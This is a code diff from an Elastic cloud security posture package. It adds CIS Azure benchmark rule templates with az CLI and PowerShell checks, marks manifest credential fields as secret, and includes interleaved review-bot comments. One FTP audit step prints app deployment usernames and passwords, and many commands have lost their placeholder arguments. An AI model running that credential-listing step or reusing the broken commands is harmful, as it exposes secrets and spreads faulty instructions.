{ + "@timestamp": "2024-04-04T16:32:27.398Z", + "cluster_id": "cluster_test_1", + "ecs": { + "version": "8.6.0" + }, + "orchestrator": { + "cluster": { + "id": "cluster_test", + "name": "cluster_test" + } + }, + "rule": { + "benchmark": { + "id": "cis_eks", + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "posture_type": "kspm", + "rule_number": "3.2.5", + "version": "v1.0.1" + } + } + } + ] +} \ No newline at end of file diff --git a/packages/cloud_security_posture/data_stream/findings/elasticsearch/ingest_pipeline/default.yml b/packages/cloud_security_posture/data_stream/findings/elasticsearch/ingest_pipeline/default.yml index 71da37a8f5f..3ee866d43a4 100644 --- a/packages/cloud_security_posture/data_stream/findings/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cloud_security_posture/data_stream/findings/elasticsearch/ingest_pipeline/default.yml @@ -13,7 +13,18 @@ processors: field: orchestrator.cluster.id copy_from: cluster_id description: 'Backward compatibility cloudbeat version < 8.8' + ignore_empty_value: true if: ctx.orchestrator?.cluster?.id == null +- remove: + field: cloud.account.id + ignore_missing: true + description: 'Removes cloud.account.id when it is empty' + if: ctx.cloud?.account?.id == '' +- remove: + field: cloud.account.name + ignore_missing: true + description: 'Removes cloud.account.name when it is empty' + if: ctx.cloud?.account?.name == '' on_failure: - set: field: event.kind diff --git a/packages/cloud_security_posture/data_stream/findings/manifest.yml b/packages/cloud_security_posture/data_stream/findings/manifest.yml index b517accf1c0..5c54cde3146 100644 --- a/packages/cloud_security_posture/data_stream/findings/manifest.yml +++ b/packages/cloud_security_posture/data_stream/findings/manifest.yml @@ -31,7 +31,7 @@ streams: multi: false required: false show_user: true - secret: false + secret: true - name: session_token type: text title: Session Token 
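Review bot: The two new `remove` processors only fire on an exact empty string (`== ''`), so a whitespace-only or `null` `cloud.account.id`/`cloud.account.name` still passes through, and when both are removed the empty parent is left behind — the new expected fixture shows exactly that (`"account": {}`), which is harmless for aggregations but leaves an inconsistent document shape in `_source` compared with the KSPM events in the same fixture that carry no `cloud.account` at all. Widen the guard to `if: ctx.cloud?.account?.id instanceof String && ctx.cloud.account.id.trim().isEmpty()` (same for `name`), and add a third `remove` on `cloud.account` with `if: ctx.cloud?.account instanceof Map && ctx.cloud.account.isEmpty()`. The `processors:` list continues outside the hunk, and the `on_failure` handler that starts inside it runs past its end.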
@@ -81,7 +81,7 @@ streams: multi: false required: false show_user: true - secret: false + secret: true - name: session_token type: text title: Session Token @@ -161,6 +161,7 @@ streams: multi: false required: false show_user: true + secret: true - input: cloudbeat/cis_azure title: CIS Azure Benchmark description: CIS Benchmark for Microsoft Azure Foundations @@ -197,7 +198,7 @@ streams: multi: false required: false show_user: true - secret: false + secret: true - name: azure.credentials.client_username type: text title: Client Username @@ -210,7 +211,7 @@ streams: multi: false required: false show_user: true - secret: false + secret: true - name: azure.credentials.client_certificate_path type: text title: Client Certificate Path @@ -223,4 +224,4 @@ streams: multi: false required: false show_user: true - secret: false + secret: true diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/01629238-aea8-5737-a59b-45baf8dab404.json b/packages/cloud_security_posture/kibana/csp_rule_template/01629238-aea8-5737-a59b-45baf8dab404.json new file mode 100644 index 00000000000..cf707ba4268 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/01629238-aea8-5737-a59b-45baf8dab404.json 
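Review bot: The `@@ -210,7 +211,7 @@` hunk flips `secret: true` on the variable immediately preceding `azure.credentials.client_certificate_path`, which from the hunk ordering (it follows `azure.credentials.client_username` at `@@ -197,7 +198,7 @@`) appears to be the client username itself rather than a credential. A username is identity metadata operators need to read back when auditing which service principal an integration runs as; once `secret: true` it is written to the secrets store and is no longer displayed after save. If that variable really is `client_username`, consider leaving it `secret: false` and reserving `secret: true` for the client secret, certificate password and session token; if it is actually a password-type variable, a `description:` naming it as such would settle the question. The enclosing `vars:` list starts outside the hunk.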
@@ -0,0 +1,38 @@ +{ + "id": "01629238-aea8-5737-a59b-45baf8dab404", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "**NOTE:** You must have your key vault setup to utilize this.\nAll Audit Logs will be encrypted with a key you provide. You will need to set up customer managed keys separately, and you will select which key to use via the instructions here. You will be responsible for the lifecycle of the keys, and will need to manually replace them at your own determined intervals to keep the data secure.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-5-encrypt-sensitive-data-at-rest\n2. https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log?tabs=cli#managing-legacy-log-profiles", + "id": "01629238-aea8-5737-a59b-45baf8dab404", + "name": "Ensure the storage account containing the container with activity logs is encrypted with Customer Managed Key", + "profile_applicability": "* Level 2", + "description": "Storage accounts with the activity log exports can be configured to use Customer Managed Keys (CMK).", + "rationale": "Configuring the storage account with the activity log export container to use CMKs provides additional confidentiality controls on log data, as a given user must have read permission on the corresponding storage account and must be granted decrypt permission by the CMK.", + "audit": "**From Azure Portal**\n\n1. Go to `Activity log`\n2. Select `Export`\n3. Select `Subscription`\n4. In section `Storage Account`, note the name of the Storage account\n5. Close the `Export Audit Logs` blade. Close the `Monitor - Activity Log` blade.\n6. In right column, Click service `Storage Accounts` to access Storage account blade\n7. Click on the storage account name noted in step 4. This will open blade specific to that storage account\n8. Under `Security + networking`, click `Encryption`.\n9. 
Ensure `Customer-managed keys` is selected and `Key URI` is set.\n\n**From Azure CLI**\n\n10. Get storage account id configured with log profile:\n\n```\naz monitor diagnostic-settings subscription list --subscription --query 'value[*].storageAccountId'\n```\n\n11. Ensure the storage account is encrypted with CMK:\n\n```\naz storage account list --query \"[?name=='']\"\n```\n\nIn command output ensure `keySource` is set to `Microsoft.Keyvault` and `keyVaultProperties` is not set to `null`\n\n**From PowerShell**\n\n```\nGet-AzStorageAccount -ResourceGroupName -Name |select-object -ExpandProperty encryption|format-list\n```\n\nEnsure the value of `KeyVaultProperties` is not `null` or empty, and ensure `KeySource` is not set to `Microsoft.Storage`.", + "remediation": "**From Azure Portal**\n\n1. Navigate to the Storage accounts blade.\n2. Click on the storage account.\n3. Under `Security + networking`, click `Encryption`.\n4. Next to `Encryption type`, select `Customer-managed keys`.\n5. Complete the steps to configure a customer-managed key for encryption of the storage account.\n\n**From Azure CLI**\n\n```\naz storage account update --name --resource-group --encryption-key-source=Microsoft.Keyvault --encryption-key-vault --encryption-key-name --encryption-key-version \n```\n\n**From PowerShell**\n\n```\nSet-AzStorageAccount -ResourceGroupName -Name -KeyvaultEncryption -KeyVaultUri -KeyName \n```", + "section": "Configuring Diagnostic Settings", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 5.1.4", + "Configuring Diagnostic Settings" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "5.1.4", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_5_1_4" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file 
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/02da047f-bc78-5565-86a0-e121850f76c0.json b/packages/cloud_security_posture/kibana/csp_rule_template/02da047f-bc78-5565-86a0-e121850f76c0.json new file mode 100644 index 00000000000..9f2e13b1d5b --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/02da047f-bc78-5565-86a0-e121850f76c0.json 
@@ -0,0 +1,38 @@ +{ + "id": "02da047f-bc78-5565-86a0-e121850f76c0", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/mysql/concepts-ssl-connection-security\n2. https://docs.microsoft.com/en-us/azure/mysql/howto-configure-ssl\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-4-enable-data-at-rest-encryption-by-default", + "id": "02da047f-bc78-5565-86a0-e121850f76c0", + "name": "Ensure 'TLS Version' is set to 'TLSV1.2' for MySQL flexible Database Server", + "profile_applicability": "* Level 1", + "description": "Ensure `TLS version` on `MySQL flexible` servers is set to the default value.", + "rationale": "TLS connectivity helps to provide a new layer of security by connecting database server to client applications using Transport Layer Security (TLS).\nEnforcing TLS connections between database server and client applications helps protect against \"man in the middle\" attacks by encrypting the data stream between the server and application.", + "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com\n2. Go to `Azure Database for MySQL flexible servers`\n3. For each database, click on `Server parameters` under `Settings`\n4. In the search box, type in `tls_version`\n5. 
Ensure `tls_version` is set to `TLSV1.2`\n\n**From Azure CLI**\n\nEnsure the output of the below command contains the key value pair `\"values\": \"TLSV1.2\"`.\n ```\n az mysql flexible-server parameter show --name tls_version --resource-group --server-name \n```\n\nExample output:\n```\n{\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"dataType\": \"Set\",\n \"defaultValue\": \"TLSv1.2\",\n \"description\": \"Which protocols the server permits for encrypted connections.\nBy default, TLS 1.2 is enforced\",\n \"id\": \"/subscriptions//resourceGroups//providers/Microsoft.DBforMySQL/flexibleServers//configurations/tls_version\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n \"isReadOnly\": \"False\",\n \"name\": \"tls_version\",\n \"resourceGroup\": \"\",\n \"source\": \"system-default\",\n \"systemData\": null,\n \"type\": \"Microsoft.DBforMySQL/flexibleServers/configurations\",\n \"value\": \"TLSv1.2\"\n}\n```", + "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com\n2. Go to `Azure Database for MySQL flexible servers`\n3. For each database, click on `Server parameters` under `Settings`\n4. In the search box, type in `tls_version`\n5. 
Click on the VALUE dropdown, and ensure only `TLSV1.2` is selected for `tls_version`\n\n**From Azure CLI**\n\nUse the below command to set MYSQL flexible databases to used version 1.2 for the `tls_version` parameter.\n```\n az mysql flexible-server parameter set --name tls_version --resource-group --server-name --value TLSV1.2\n```", + "section": "MySQL Database", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.4.2", + "MySQL Database" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.4.2", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_4_2" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/090923c7-e599-572b-bad3-703f768c262a.json b/packages/cloud_security_posture/kibana/csp_rule_template/090923c7-e599-572b-bad3-703f768c262a.json new file mode 100644 index 00000000000..316980c275c --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/090923c7-e599-572b-bad3-703f768c262a.json 
@@ -0,0 +1,38 @@ +{ + "id": "090923c7-e599-572b-bad3-703f768c262a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Being a level 2, enabling this setting can have a high impact on the cost of data storage used for logging more data per each request. Do not enable this without determining your need for this level of logging or forget to check in on data usage and projected cost.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/storageservices/about-storage-analytics-logging\n2. https://docs.microsoft.com/en-us/cli/azure/storage/logging?view=azure-cli-latest\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources", + "id": "090923c7-e599-572b-bad3-703f768c262a", + "name": "Ensure Storage Logging is Enabled for Table Service for 'Read', 'Write', and 'Delete' Requests", + "profile_applicability": "* Level 2", + "description": "Azure Table storage is a service that stores structured NoSQL data in the cloud, providing a key/attribute store with a schema-less design.\nStorage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account.\nThese logs allow users to see the details of read, write, and delete operations against the tables.\nStorage Logging log entries contain the following information about individual requests: timing information such as start time, end-to-end latency, and server latency; authentication details; concurrency information; and the sizes of the request and response messages.", + "rationale": "Storage Analytics logs contain detailed information about successful and failed requests to a storage service.\nThis information can be used to monitor each individual request to a storage service for increased security or diagnostics.\nRequests are logged on a best-effort basis.\n\nStorage Analytics logging is not enabled by default for 
your storage account.", + "audit": "**From Azure Portal**\n\n1. From the default portal page select `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings` under the `Monitoring` section in the left column.\n4. Select the 'table' tab indented below the storage account. Then select the diagnostic setting listed.\n5. Ensure `StorageRead`, `StorageWrite`, and `StorageDelete` options are selected under the `Logging section` and that they are sent to the correct destination.\n\n**From Azure CLI**\n\nEnsure the below command's output contains properties delete, read and write set to true.\n\n```\naz storage logging show --services t --account-name \n```", + "remediation": "**From Azure Portal**\n\n1. From the default portal page select `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings` under the `Monitoring` section in the left column.\n4. Select the 'table' tab indented below the storage account. \n5. Click '+ Add diagnostic setting'.\n6. Select `StorageRead`, `StorageWrite` and `StorageDelete` options under the `Logging` section to enable Storage Logging for Table service.\n7. Select a destination for your logs to be sent to.\n\n**From Azure CLI**\n\nUse the below command to enable the Storage Logging for Table service.\n\n```\naz storage logging update --account-name --account-key --services t --log rwd --retention 90\n```", + "section": "Storage Accounts", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 3.14", + "Storage Accounts" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "3.14", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_3_14" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file 
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/213e2b33-f2b1-575b-8753-f239b278c25a.json b/packages/cloud_security_posture/kibana/csp_rule_template/213e2b33-f2b1-575b-8753-f239b278c25a.json new file mode 100644 index 00000000000..a551e308efe --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/213e2b33-f2b1-575b-8753-f239b278c25a.json 
@@ -0,0 +1,38 @@ +{ + "id": "213e2b33-f2b1-575b-8753-f239b278c25a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/postgresql/singleserver/configurations/list-by-server\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources\n4. https://learn.microsoft.com/en-us/azure/postgresql/single-server/concepts-server-logs#configure-logging\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n6. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name", + "id": "213e2b33-f2b1-575b-8753-f239b278c25a", + "name": "Ensure Server Parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server", + "profile_applicability": "* Level 1", + "description": "Enable `log_checkpoints` on `PostgreSQL Servers`.", + "rationale": "Enabling `log_checkpoints` helps the PostgreSQL Database to `Log each checkpoint` in turn generates query and error logs.\nHowever, access to transaction logs is not supported.\nQuery and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_checkpoints`.\n5. 
Ensure that value is set to `ON`.\n\n**From Azure CLI**\n\nEnsure value is set to `ON`\n```\naz postgres server configuration show --resource-group --server-name --name log_checkpoints\n```\n\n**From PowerShell**\n\nEnsure value is set to `ON`\n\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_checkpoints\n```", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_checkpoints`.\n5. Click `ON` and save.\n\n**From Azure CLI**\n\nUse the below command to update `log_checkpoints` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name log_checkpoints --value on\n```\n\n**From PowerShell**\n\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_checkpoints -Value on\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.2", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.2", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_2" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/27896f4b-0405-5388-bacd-182e77556711.json b/packages/cloud_security_posture/kibana/csp_rule_template/27896f4b-0405-5388-bacd-182e77556711.json new file mode 100644 index 00000000000..366be869d51 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/27896f4b-0405-5388-bacd-182e77556711.json 
@@ -0,0 +1,38 @@ +{ + "id": "27896f4b-0405-5388-bacd-182e77556711", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/sql-database/sql-database-auditing\n2. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/get-azurermsqlserverauditing?view=azurermps-5.2.0\n3. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/set-azurermsqlserverauditing?view=azurermps-5.2.0\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-6-configure-log-storage-retention", + "id": "27896f4b-0405-5388-bacd-182e77556711", + "name": "Ensure that 'Auditing' Retention is 'greater than 90 days'", + "profile_applicability": "* Level 1", + "description": "SQL Server Audit Retention should be configured to be greater than 90 days.", + "rationale": "Audit Logs can be used to check for anomalies and give insight into suspected breaches or misuse of information and access.", + "audit": "**From Azure Portal**\n\n1. Go to `SQL servers`\n2. For each server instance\n3. Click on `Auditing`\n4. If storage is selected, expand `Advanced properties`\n5. Ensure `Retention (days)` setting is greater than `90` days or `0` for unlimited retention.\n\n**From PowerShell**\n\nGet the list of all SQL Servers \n```\nGet-AzSqlServer\n```\nFor each Server\n```\nGet-AzSqlServerAudit -ResourceGroupName -ServerName \n```\nEnsure that `RetentionInDays` is set to `more than 90`\n\n**Note:** If the SQL server is set with `LogAnalyticsTargetState` setting set to `Enabled`, run the following additional command.\n\n```\nGet-AzOperationalInsightsWorkspace | Where-Object {$_.ResourceId -eq }\n```\n\nEnsure that `RetentionInDays` is set to `more than 90`", + "remediation": "**From Azure Portal**\n\n1. Go to `SQL servers`\n2. For each server instance\n3. Click on `Auditing`\n4. If storage is selected, expand `Advanced properties`\n5. 
Set the `Retention (days)` setting greater than `90` days or `0` for unlimited retention.\n6. Select `Save`\n\n**From PowerShell**\nFor each Server, set retention policy to more than 90 days\n\n**Log Analytics Example**\n```\nSet-AzSqlServerAudit -ResourceGroupName -ServerName -RetentionInDays -LogAnalyticsTargetState Enabled -WorkspaceResourceId \"/subscriptions//resourceGroups/insights-integration/providers/Microsoft.OperationalInsights/workspaces/\n```\n\n**Event Hub Example**\n\n```\nSet-AzSqlServerAudit -ResourceGroupName \"\" -ServerName \"\" -EventHubTargetState Enabled -EventHubName \n \"\" -EventHubAuthorizationRuleResourceId \"\"\n```\n\n**Blob Storage Example***\n\n```\nSet-AzSqlServerAudit -ResourceGroupName \"\" -ServerName \"\" -BlobStorageTargetState Enabled \n -StorageAccountResourceId \"/subscriptions//resourceGroups//providers/Microsoft.Stora\n ge/storageAccounts/\"\n```", + "section": "SQL Server - Auditing", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.1.6", + "SQL Server - Auditing" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.1.6", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_1_6" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/43d5538c-17a3-5e04-9c06-ad4323bfd188.json b/packages/cloud_security_posture/kibana/csp_rule_template/43d5538c-17a3-5e04-9c06-ad4323bfd188.json new file mode 100644 index 00000000000..d92273203a7 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/43d5538c-17a3-5e04-9c06-ad4323bfd188.json 
@@ -0,0 +1,38 @@ +{ + "id": "43d5538c-17a3-5e04-9c06-ad4323bfd188", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Any deployment workflows that rely on FTP or FTPs rather than the WebDeploy or HTTPs endpoints may be affected.", + "default_value": "", + "references": "1. [Azure Web Service Deploy via FTP](https://docs.microsoft.com/en-us/azure/app-service/deploy-ftp):[Azure Web Service Deployment](https://docs.microsoft.com/en-us/azure/app-service/overview-security)\n2. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-4-encrypt-sensitive-information-in-transit\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-posture-vulnerability-management#pv-7-rapidly-and-automatically-remediate-software-vulnerabilities", + "id": "43d5538c-17a3-5e04-9c06-ad4323bfd188", + "name": "Ensure FTP deployments are Disabled", + "profile_applicability": "* Level 1", + "description": "By default, Azure Functions, Web, and API Services \ncan be deployed over FTP.\nIf FTP is required for an\nessential deployment workflow, FTPS should be required\nfor FTP login for all App Service Apps and Functions.", + "rationale": "Azure FTP deployment endpoints are public.\nAn attacker listening to traffic on a wifi network used by a remote employee or a corporate network could see login traffic in clear-text which would then grant them full control of the code base of the app or service.\nThis finding is more severe if User Credentials for deployment are set at the subscription level rather than using the default Application Credentials which are unique per App.", + "audit": "**From Azure Portal**\n\n1. Go to the Azure Portal\n2. Select `App Services`\n3. Click on an app\n4. Select `Settings` and then `Configuration`\n5. 
Under `General Settings`, for the `Platform Settings`, the `FTP state` should not be set to `All allowed`\n\n**From Azure CLI** \n\nList webapps to obtain the ids.\n\n```\naz webapp list\n```\n\nList the publish profiles to obtain the username, password\nand ftp server url.\n\n```\naz webapp deployment list-publishing-profiles --ids \n{\n \"publishUrl\": ,\n \"userName\": ,\n \"userPWD\": ,\n}\n```\n\n**From PowerShell**\n\nList all Web Apps:\n\n```\nGet-AzWebApp\n```\n\nFor each app:\n\n```\nGet-AzWebApp -ResourceGroupName -Name | Select-Object -ExpandProperty SiteConfig\n```\n\nIn the output, look for the value of **FtpsState**.\nIf its value is **AllAllowed** the setting is out of compliance.\nAny other value is considered in compliance with this check.", + "remediation": "**From Azure Portal**\n\n1. Go to the Azure Portal\n2. Select `App Services`\n3. Click on an app\n4. Select `Settings` and then `Configuration`\n5. Under `General Settings`, for the `Platform Settings`, the `FTP state` should be set to `Disabled` or `FTPS Only`\n\n**From Azure CLI**\n\nFor each out of compliance application, run the following choosing either 'disabled' or 'FtpsOnly' as appropriate:\n\n```\naz webapp config set --resource-group --name --ftps-state [disabled|FtpsOnly]\n```\n\n**From PowerShell**\n\nFor each out of compliance application, run the following:\n\n```\nSet-AzWebApp -ResourceGroupName -Name -FtpsState \n```", + "section": "AppService", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 9.10", + "AppService" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "9.10", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_9_10" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file 
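Review bot: The Azure CLI audit step tells the reader to run `az webapp deployment list-publishing-profiles --ids` and shows `userName`/`userPWD` in the expected output, which prints the app's deployment credentials to the terminal (and into shell history and any CI log) although the check only needs the FTPS state. Replace that step with `az webapp config show --ids <app-id> --query ftpsState -o tsv`, which never touches the publishing password; if the profile listing is kept for some reason, add a sentence that its output contains secrets and must not be captured in logs. The PowerShell audit says `Any other value is considered in compliance`, which would also pass an empty or null `FtpsState` if the API returns one — state that only `Disabled` and `FtpsOnly` are compliant, matching the remediation. The `--ids`, `--resource-group`, `--name` and `-FtpsState` arguments have lost their placeholders and should read e.g. `-FtpsState <Disabled|FtpsOnly>`.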
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/461c5ca2-0173-5b8c-ae36-b229cffefbb2.json b/packages/cloud_security_posture/kibana/csp_rule_template/461c5ca2-0173-5b8c-ae36-b229cffefbb2.json
new file mode 100644
index 00000000000..292d53f70ba
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/461c5ca2-0173-5b8c-ae36-b229cffefbb2.json
@@ -0,0 +1,38 @@ +{ + "id": "461c5ca2-0173-5b8c-ae36-b229cffefbb2", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Configuring this setting will result in logs being retained for the specified number of days. If this is configured on a high traffic server, the log may grow quickly to occupy a large amount of disk space. In this case you may want to set this to a lower number.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n2. https://docs.microsoft.com/en-us/rest/api/postgresql/singleserver/configurations/list-by-server\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-6-configure-log-storage-retention\n4. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name", + "id": "461c5ca2-0173-5b8c-ae36-b229cffefbb2", + "name": "Ensure Server Parameter 'log_retention_days' is greater than 3 days for PostgreSQL Database Server", + "profile_applicability": "* Level 1", + "description": "Ensure `log_retention_days` on `PostgreSQL Servers` is set to an appropriate value.", + "rationale": "Configuring `log_retention_days` determines the duration in days that `Azure Database for PostgreSQL` retains log files.\nQuery and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_retention_days`.\n5. 
Ensure that the `value` is between 4 and 7 (inclusive).\n\n**From Azure CLI**\n\nEnsure `log_retention_days` value is greater than 3.\n\n```\naz postgres server configuration show --resource-group --server-name --name log_retention_days\n```\n\n**From Powershell**\n\nEnsure `log_retention_days` value is greater than 3.\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_retention_days\n```", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_retention_days`.\n5. Input a value between 4 and 7 (inclusive) and click `Save`.\n\n**From Azure CLI**\n\nUse the below command to update `log_retention_days` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name log_retention_days --value <4-7>\n```\n\n**From Powershell**\n\nUse the below command to update `log_retention_days` configuration.\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_retention_days -Value <4-7>\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.6", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.6", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_6" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9.json b/packages/cloud_security_posture/kibana/csp_rule_template/5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9.json new file mode 100644 index 00000000000..c69c1d8124f --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9.json 
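Review bot: The name says `greater than 3 days` but the description only asks for `an appropriate value` and the impact text suggests lowering it, which leaves the pass criterion ambiguous for anyone reading the finding; make the description state the threshold, e.g. `Ensure log_retention_days on PostgreSQL Servers is set to a value greater than 3 (4-7 days).` The portal step says `between 4 and 7 (inclusive)` while the CLI and PowerShell steps only say `greater than 3`, so a value such as 10 would be read as compliant in one path and out of range in the other; align the three (the 4–7 bound looks like the parameter's allowed range on Single Server, but confirm). The references and the `az postgres server` commands target the Single Server deployment option; a sentence scoping the rule to that option would avoid readers applying it to flexible servers, where these commands do not apply as far as I can tell. The `--resource-group`/`--server-name`/`-ResourceGroupName`/`-ServerName` placeholders have been stripped from the commands.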
